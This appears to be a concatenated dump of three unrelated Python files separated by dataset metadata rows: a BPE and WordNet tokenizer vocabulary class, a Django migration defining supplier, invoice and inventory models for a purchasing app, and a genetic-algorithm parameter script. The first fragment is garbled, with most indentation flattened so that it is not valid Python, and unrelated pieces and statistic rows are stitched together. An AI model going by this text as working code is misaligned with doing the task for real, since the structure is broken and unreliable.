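# the token index runs continuously across sentences.
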
class SegaBPEVocab(SegaVocab):
def __init__(self, special=[], min_freq=1, max_size=None, lower_case=True,
delimiter=None, vocab_file=None, tokenizer_path=None):
self.counter = Counter()
self.special = special
self.min_freq = min_freq
self.max_size = max_size
self.lower_case = lower_case
self.delimiter = delimiter
self.vocab_file = vocab_file
self.cl_root_tokens = []
self.cl_leaf_tokens = []
self.word2class = {}
self.class2words = defaultdict(list)
self.word2class_dict = defaultdict(dict)
self.tokenizer = Tokenizer.from_file(tokenizer_path)
self.tokenizer.add_special_tokens(self.special)
self.unk_idx = self.tokenizer.get_vocab()['<unk>']
def tokenize(self, line, add_eos=False, add_double_eos=False, add_sent_eos=False, char_level=False):
line = line.strip()
if char_level:
line = ' '.join([str(ord(c)) for c in line])
# convert to lower case
if self.lower_case:
line = line.lower()
symbols = self.tokenizer.encode(
line).tokens
if add_sent_eos:
symbols = symbols + ['<sent_eos>']
if add_double_eos: # lm1b
return ['<S>'] + symbols + ['<S>']
elif add_eos:
return symbols + ['<eos>']
else:
return symbols
def get_wn_replaced_dict(self, synset_layer=5, ignore_freqency_threshold=3000, replaced_with_new_symbol=True,
min_tokens_per_hypernym=0):
word2class = {}
class2words = defaultdict(list)
for k_ori, cnt in self.counter.most_common(self.max_size):
if cnt >= ignore_freqency_threshold:
continue
if cnt < self.min_freq:
break
if '▁' not in k_ori:
continue
else:
k = k_ori.strip('▁')
continue_for_k = True
for synset in wn.synsets(k):
paths = synset.hypernym_paths()
for path in paths:
if len(path) < synset_layer+1:
continue
else:
hypernym_name = path[synset_layer].name()
if '.n.' not in hypernym_name:
continue
                        if not replaced_with_new_symbol:
                            # As in ``Vocab.get_wn_replaced_dict``, the
                            # original ``.split('')`` raises ValueError; keep
                            # only the synset-name prefix (result unused).
                            hypernym_name = hypernym_name.split('.')[0]
                        class2words[path[synset_layer].name()].append(k_ori)
                        word2class[k_ori] = path[synset_layer].name()
# self.counter.update([path[synset_layer].name()]*cnt)
self.counter.update([path[synset_layer].name()])
continue_for_k = False
break
if not continue_for_k:
break
for k, v in class2words.items():
if len(v) >= min_tokens_per_hypernym:
self.class2words[k].extend(v)
for token in v:
self.word2class[token] = k
            else:
                self.counter[k] = 0
for k, v in self.class2words.items():
self.cl_root_tokens.append(k)
self.cl_leaf_tokens.extend(v)
self.cl_leaf_tokens = list(set(self.cl_leaf_tokens))
self.tokenizer.add_special_tokens(self.cl_root_tokens)
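
        # Usage sketch (illustrative; the tokenizer JSON path below is a
        # placeholder):
        #
        #     vocab = SegaBPEVocab(special=['<eos>', '<sent_eos>'],
        #                          tokenizer_path='bpe-tokenizer.json')
        #     vocab.count_file('train.txt', add_eos=True)
        #     vocab.get_wn_replaced_dict()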
# self.vocab.cl_root_tokens = list(self.vocab.class2words.keys())
        # self.vocab.cl_leaf_tokens = list(self.vocab.word2class.keys())
| 41.368984 | 143 | 0.534083 | 2,743 | 23,208 | 4.294933 | 0.06307 | 0.019353 | 0.023428 | 0.027162 | 0.838808 | 0.82285 | 0.802309 | 0.796707 | 0.781852 | 0.768271 | 0 | 0.01185 | 0.367287 | 23,208 | 561 | 144 | 41.368984 | 0.790316 | 0.033652 | 0 | 0.790224 | 0 | 0 | 0.03088 | 0 | 0 | 0 | 0 | 0 | 0.016293 | 1 | 0.057026 | false | 0 | 0.01222 | 0.008147 | 0.118126 | 0.04888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
034f9f95d1e10801588612245287eef6ace62e4b | 42,300 | py | Python | purchasing/migrations/0001_initial.py | mark-bondo/moondance | 3347c3fb8ac3e40a5c66b61a21cfb562841531ba | [
"MIT"
] | null | null | null | purchasing/migrations/0001_initial.py | mark-bondo/moondance | 3347c3fb8ac3e40a5c66b61a21cfb562841531ba | [
"MIT"
] | null | null | null | purchasing/migrations/0001_initial.py | mark-bondo/moondance | 3347c3fb8ac3e40a5c66b61a21cfb562841531ba | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-05-31 14:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
("operations", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Supplier",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
(
"type",
models.CharField(
choices=[
("Distributor", "Distributor"),
("Manufacturer", "Manufacturer"),
],
default="Manufacturer",
max_length=200,
),
),
("name", models.CharField(max_length=200, unique=True)),
(
"contact_name",
models.CharField(blank=True, max_length=200, null=True),
),
(
"contact_email",
models.CharField(blank=True, max_length=200, null=True),
),
(
"street_address",
models.CharField(blank=True, max_length=200, null=True),
),
("city", models.CharField(blank=True, max_length=200, null=True)),
("state", models.CharField(blank=True, max_length=200, null=True)),
(
"postal_code",
models.CharField(blank=True, max_length=200, null=True),
),
(
"country",
models.CharField(
blank=True, default="United States", max_length=200, null=True
),
),
("supplier_website", models.URLField(blank=True, null=True)),
("notes", models.TextField(blank=True, null=True)),
(
"phone_number",
models.CharField(blank=True, max_length=50, null=True),
),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
],
options={
"verbose_name": "Supplier",
"verbose_name_plural": "Suppliers",
"ordering": ("name",),
},
),
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
("invoice", models.CharField(blank=True, max_length=200, null=True)),
("order", models.CharField(blank=True, max_length=200, null=True)),
("date_invoiced", models.DateField(default=django.utils.timezone.now)),
(
"freight_charges",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"supplier",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Invoice_supplier_fk",
to="purchasing.supplier",
verbose_name="Invoicing Supplier",
),
),
],
options={
"verbose_name": "Inventory Receipt",
"verbose_name_plural": "Inventory Receipts",
"ordering": ("-date_invoiced", "invoice"),
},
),
migrations.CreateModel(
name="HistoricalSupplier_Product",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
("supplier_sku", models.CharField(max_length=200)),
("supplier_sku_description", models.CharField(max_length=200)),
("supplier_sku_link", models.URLField(blank=True, null=True)),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"sku",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="operations.product",
),
),
(
"supplier",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.supplier",
),
),
],
options={
"verbose_name": "historical Supplier Product",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalSupplier",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
(
"type",
models.CharField(
choices=[
("Distributor", "Distributor"),
("Manufacturer", "Manufacturer"),
],
default="Manufacturer",
max_length=200,
),
),
("name", models.CharField(db_index=True, max_length=200)),
(
"contact_name",
models.CharField(blank=True, max_length=200, null=True),
),
(
"contact_email",
models.CharField(blank=True, max_length=200, null=True),
),
(
"street_address",
models.CharField(blank=True, max_length=200, null=True),
),
("city", models.CharField(blank=True, max_length=200, null=True)),
("state", models.CharField(blank=True, max_length=200, null=True)),
(
"postal_code",
models.CharField(blank=True, max_length=200, null=True),
),
(
"country",
models.CharField(
blank=True, default="United States", max_length=200, null=True
),
),
("supplier_website", models.URLField(blank=True, null=True)),
("notes", models.TextField(blank=True, null=True)),
(
"phone_number",
models.CharField(blank=True, max_length=50, null=True),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "historical Supplier",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalInvoice_Line",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
(
"unit_of_measure",
models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("minutes", "minutes"),
],
max_length=200,
),
),
("quantity", models.DecimalField(decimal_places=2, max_digits=12)),
("total_cost", models.DecimalField(decimal_places=2, max_digits=12)),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"invoice",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.invoice",
),
),
(
"manufacturer",
models.ForeignKey(
blank=True,
db_constraint=False,
help_text="Only needs to be populated if the manufacturer is different than the invoicing supplier.",
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.supplier",
verbose_name="Manufacturer",
),
),
(
"sku",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="operations.product",
verbose_name="MoonDance SKU",
),
),
],
options={
"verbose_name": "historical Recipt Line",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalInvoice",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
("invoice", models.CharField(blank=True, max_length=200, null=True)),
("order", models.CharField(blank=True, max_length=200, null=True)),
("date_invoiced", models.DateField(default=django.utils.timezone.now)),
(
"freight_charges",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"supplier",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.supplier",
verbose_name="Invoicing Supplier",
),
),
],
options={
"verbose_name": "historical Inventory Receipt",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalInventory_Onhand",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
(
"location",
models.CharField(
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
verbose_name="Current Location",
),
),
(
"quantity_onhand",
models.DecimalField(decimal_places=2, max_digits=12),
),
(
"to_location",
models.CharField(
blank=True,
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
null=True,
verbose_name="Transfer To Location",
),
),
(
"transfer_quantity",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"sku",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="operations.product",
),
),
],
options={
"verbose_name": "historical Inventory Onhand",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="Supplier_Product",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
("supplier_sku", models.CharField(max_length=200)),
("supplier_sku_description", models.CharField(max_length=200)),
("supplier_sku_link", models.URLField(blank=True, null=True)),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_product_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_product_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"sku",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Supplier_Product_product_fk",
to="operations.product",
),
),
(
"supplier",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_product_supplier_fk",
to="purchasing.supplier",
),
),
],
options={
"verbose_name": "Supplier Product",
"verbose_name_plural": "Supplier Products",
"ordering": ("sku", "supplier_sku"),
"unique_together": {("supplier", "supplier_sku")},
},
),
migrations.CreateModel(
name="Invoice_Line",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
(
"unit_of_measure",
models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("minutes", "minutes"),
],
max_length=200,
),
),
("quantity", models.DecimalField(decimal_places=2, max_digits=12)),
("total_cost", models.DecimalField(decimal_places=2, max_digits=12)),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_line_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_line_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"invoice",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="Invoice_Line_invoice_fk",
to="purchasing.invoice",
),
),
(
"manufacturer",
models.ForeignKey(
blank=True,
help_text="Only needs to be populated if the manufacturer is different than the invoicing supplier.",
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="Invoice_Manufacturer_fk",
to="purchasing.supplier",
verbose_name="Manufacturer",
),
),
(
"sku",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Invoice_Line_sku_fk",
to="operations.product",
verbose_name="MoonDance SKU",
),
),
],
options={
"verbose_name": "Recipt Line",
"verbose_name_plural": "Recipt Lines",
"ordering": ("sku",),
"unique_together": {("sku", "invoice")},
},
),
migrations.CreateModel(
name="Inventory_Onhand",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
(
"location",
models.CharField(
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
verbose_name="Current Location",
),
),
(
"quantity_onhand",
models.DecimalField(decimal_places=2, max_digits=12),
),
(
"to_location",
models.CharField(
blank=True,
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
null=True,
verbose_name="Transfer To Location",
),
),
(
"transfer_quantity",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="inventory_onhand_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="inventory_onhand_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"sku",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Inventory_Onhand_sku_fk",
to="operations.product",
),
),
],
options={
"verbose_name": "Inventory Onhand",
"verbose_name_plural": "Inventory Onhand",
"ordering": ("sku", "location"),
"unique_together": {("sku", "location")},
},
),
migrations.AlterField(
model_name="historicalinvoice_line",
name="unit_of_measure",
field=models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("hourly", "hourly"),
],
max_length=200,
),
),
migrations.AlterField(
model_name="invoice_line",
name="unit_of_measure",
field=models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("hourly", "hourly"),
],
max_length=200,
),
),
]
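

# Illustrative ORM usage once this migration is applied (model and field
# names come from the operations above; concrete values are placeholders):
#
#     supplier = Supplier.objects.create(name="Acme Soaps", type="Manufacturer")
#     invoice = Invoice.objects.create(supplier=supplier, invoice="INV-001")
#     Invoice_Line.objects.create(invoice=invoice, sku=some_product,
#                                 unit_of_measure="lbs", quantity=10,
#                                 total_cost=25)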
| 38.950276 | 125 | 0.373262 | 2,698 | 42,300 | 5.618977 | 0.067457 | 0.061675 | 0.036939 | 0.058047 | 0.920844 | 0.912137 | 0.903298 | 0.902177 | 0.892546 | 0.888918 | 0 | 0.009277 | 0.533641 | 42,300 | 1,085 | 126 | 38.986175 | 0.759213 | 0.001064 | 0 | 0.821892 | 1 | 0 | 0.131139 | 0.01394 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004638 | 0 | 0.008349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
037138359f6073b74c19121804c6dae8c0147c18 | 9,768 | py | Python | tables.py | leguiart/Evolutionary_Computing | 67dc2d8e284ea4b9d21af10793778b942708114b | [
"MIT"
] | 1 | 2021-07-06T12:54:20.000Z | 2021-07-06T12:54:20.000Z | tables.py | leguiart/Evolutionary_Computing | 67dc2d8e284ea4b9d21af10793778b942708114b | [
"MIT"
] | null | null | null | tables.py | leguiart/Evolutionary_Computing | 67dc2d8e284ea4b9d21af10793778b942708114b | [
"MIT"
] | null | null | null | from tabulate import tabulate
from hklearn_genetic.problem import BinaryRastrigin, BinaryBeale, BinaryHimmelblau, BinaryEggholder
from texttable import Texttable
import latextable
rast = BinaryRastrigin(n_dim = 2, n_prec=8)
beale = BinaryBeale(n_prec=8)
himme = BinaryHimmelblau(n_prec=8)
egg = BinaryEggholder(n_prec=4)
params_bin = {'PS_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional'}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'proportional'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.020833333333333332, 'max_iter': 1000, 'selection': 'proportional'}}, 'PS_E_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.1}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.3}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.3}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.020833333333333332, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.1}}, 'TS_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'tournament'}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'tournament'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'tournament'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.015625, 'max_iter': 1000, 'selection': 'tournament'}}, 'TS_E_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}, 'Eggholder': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.015625, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.3}}, 'SUS_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'sus'}, 'Beale': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'sus'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'sus'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.020833333333333332, 'max_iter': 1000, 'selection': 'sus'}}, 'SUS_E_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.3}, 'Eggholder': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.005208333333333333, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}}}
